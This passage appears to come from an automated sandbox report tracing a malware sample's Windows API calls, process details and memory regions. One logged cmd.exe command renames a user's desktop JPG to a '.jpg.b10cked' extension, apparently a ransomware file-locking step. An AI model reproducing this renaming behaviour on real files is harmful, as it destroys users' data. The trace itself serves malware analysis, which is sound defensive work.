lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.259] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.259] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] GetFileType (hFile=0x4c) returned 0x1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.259] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.260] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.260] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.260] GetFileType (hFile=0x4c) returned 0x1 [0142.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, 
lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.261] GetFileType (hFile=0x4c) returned 0x1 [0142.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: 
lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.262] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.262] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] GetFileType (hFile=0x4c) returned 0x1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.262] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.263] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.263] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] 
GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] GetFileType (hFile=0x4c) returned 0x1 [0142.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.263] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 
[0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] GetFileType (hFile=0x4c) returned 0x1 [0142.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.264] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.265] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.265] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x32, lpOverlapped=0x0) returned 1 [0142.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.265] GetFileType (hFile=0x4c) returned 0x1 [0142.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.265] GetFileType (hFile=0x4c) returned 0x1 [0142.265] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.265] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x32, lpOverlapped=0x0) returned 1 [0142.265] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.265] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.265] _close 
(_FileHandle=4) returned 0 [0142.265] FindNextFileW (in: hFindFile=0x1e0e90, lpFindFileData=0x1cef74 | out: lpFindFileData=0x1cef74) returned 0 [0142.266] GetLastError () returned 0x12 [0142.266] FindClose (in: hFindFile=0x1e0e90 | out: hFindFile=0x1e0e90) returned 1 [0142.266] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.267] _close (_FileHandle=3) returned 0 [0142.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.267] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.267] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.267] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.267] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.268] SetConsoleInputExeNameW () returned 0x1 [0142.268] GetConsoleOutputCP () returned 0x1b5 [0142.268] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.268] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.268] exit (_Code=0) Process: id = "175" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d40" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] 
Region: id = 15028 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15029 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15030 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15031 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 15032 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15033 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15034 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15035 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15036 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 15037 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16166 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16167 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16168 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16169 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 16170 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 16171 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16172 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16173 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16174 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16175 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16176 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16177 start_va = 0x76d70000 
end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16178 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16179 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16180 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 16181 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16182 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16183 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16184 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16185 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16186 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16187 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 16188 start_va = 0x580000 end_va = 0x117ffff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 16189 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 232 os_tid = 0xe74 [0141.913] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30ff2c | out: lpSystemTimeAsFileTime=0x30ff2c*(dwLowDateTime=0x8e8572a0, dwHighDateTime=0x1d440a9)) [0141.913] GetCurrentProcessId () returned 0xeb8 [0141.913] GetCurrentThreadId () returned 0xe74 [0141.913] GetTickCount () returned 0x2c744 [0141.913] QueryPerformanceCounter (in: lpPerformanceCount=0x30ff24 | out: lpPerformanceCount=0x30ff24*=19870198898) returned 1 [0141.914] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.914] __set_app_type (_Type=0x1) [0141.914] __p__fmode () returned 0x76b331f4 [0141.914] __p__commode () returned 0x76b331fc [0141.914] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.914] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.914] GetCurrentThreadId () returned 0xe74 [0141.914] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe74) returned 0x38 [0141.914] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.914] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.914] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.915] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, 